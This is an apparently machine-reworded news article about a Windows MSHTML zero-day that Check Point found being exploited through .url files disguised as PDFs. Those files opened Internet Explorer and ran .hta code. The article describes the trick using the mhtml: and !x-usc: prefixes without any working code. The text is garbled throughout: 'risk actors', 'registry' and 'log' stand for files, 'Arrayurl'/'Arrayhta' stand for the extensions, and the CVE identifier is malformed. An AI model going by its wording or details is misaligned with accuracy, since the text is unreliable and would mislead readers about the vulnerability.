First design
Site Theme
The authors of the risk carried out zero-day attacks on Windows users with malware for more than a year before Microsoft patched the vulnerability that made them possible, researchers said Tuesday.
The vulnerability, available in Windows 10 and 11, forces devices to open Internet Explorer, an older browser that Microsoft retired in 2022 after its old codebase made it vulnerable to exploits. As a result of this decision, Windows made it difficult, if not impossible, to open the browser, which was first introduced in the mid-1990s, to open normally.
The malicious code exploiting this vulnerability dates back to at least January 2023 and circulates in May of this year, according to researchers who discovered the vulnerability and reported it to Microsoft. The company patched the vulnerability, known as CVE-2024-CVE-38112, on Tuesday as part of its monthly patch release schedule. The vulnerability, which resided in the Windows MSHTML engine, had a severity score of 7. 0 out of 10.
Researchers at security firm Check Point said the attack code executed “new (or previously unknown) tricks to trick Windows users into executing code remotely. “A link that appeared to open a PDF file added an Arrayurl extension to the end of the registry, for example, Books_A0UJKO. pdf. url, discovered in one of the malicious code examples.
When viewed on Windows, the log displayed an icon indicating that it was a PDF record and not an Arrayurl record. These logs are designed to open an application specified in a binding.
A link in the registry called msedge. exe, a registry that runs Edge. However, the link incorporated two attributes (mhtml: and !x-usc:), an “old trick” that risk actors have used for years to fool Windows. It also contained a link to a malicious website. When you click on it, the Arrayurl record disguised as a PDF opens the site, not in Edge, but in Internet Explorer.
“From there (with the online page open with IE), the attacker can do a lot of bad things because IE is insecure and outdated,” wrote Haifei Li, the Check Point researcher who discovered the vulnerability. “For example, if the attacker has an IE zero-day exploit, which is much less difficult to locate than Chrome/Edge, the attacker can simply attack the victim to immediately gain remote code execution. However, in the samples we analyzed, the risk actors did not. they did not use any remote code execution exploits from IE. Instead, they used some other trick in IE, which probably wasn’t known to the public before, as far as we know, to trick the victim into executing code remotely.
IE would then provide the user with a conversation box asking if they want to open the file disguised as a PDF. If the user clicked “open,” Windows would provide a momentary conversation box displaying a garbled message stating that continuing would open the content on the Windows device. If users clicked “allow,” IE would load a registry that would end in Arrayhta, an extension that would force Windows to open the registry in Internet Explorer and execute the embedded code.
“To summarize the attacks from an exploitative perspective: the first strategy used in those campaigns is the ‘mhtml’ trick, which allows the attacker to call IE instead of the more secure Chrome/Edge,” Li wrote. “The strategy of the moment is an IE trick to trick the victim into believing that they are opening a PDF file, when in fact they are downloading and running a harmful Arrayhta application. The overall purpose of these attacks is to trick sufferers into believing that they are opening a PDF file, and this is imaginable through those two tricks.
Check Point’s post includes cryptographic hashes for six malicious Arrayurl files used in the campaign. Windows users can use hashes if they have been attacked.
Join Ars Orbital Transmission mail to receive weekly updates in your inbox. Sign up →